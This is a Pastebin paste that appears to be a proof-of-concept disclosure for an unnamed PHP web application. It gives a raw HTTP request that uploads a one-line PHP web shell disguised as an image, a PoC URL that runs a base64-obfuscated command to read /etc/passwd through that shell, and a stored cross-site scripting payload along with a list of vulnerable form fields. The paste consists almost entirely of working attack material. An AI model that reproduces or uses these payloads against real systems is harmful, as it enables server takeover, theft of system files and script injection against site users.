Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. Arbitrary File Upload:
- -------------------------
- Parameter: myfile (POST)
- POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29
- POST /upload.php HTTP/1.1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- X-Requested-With: XMLHttpRequest
- Referer: http://localhost/USERS/index.php
- Content-Length: 419
- Content-Type: multipart/form-data; boundary=---------------------------8914507815764
- Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
- Connection: close
- -----------------------------8914507815764
- Content-Disposition: form-data; name="myfile"; filename="Test.php"
- Content-Type: image/jpeg
- <?php
- system($_GET['cmd']);
- ?>
- -----------------------------8914507815764
- Content-Disposition: form-data; name=""
- undefined
- -----------------------------8914507815764
- Content-Disposition: form-data; name=""
- undefined
- -----------------------------8914507815764--
- 2. Persistent Cross Site Scripting:
- -----------------------------------
- http://localhost/USERS/index.php
- Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST)
- Payload: " onmousemove=alert(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement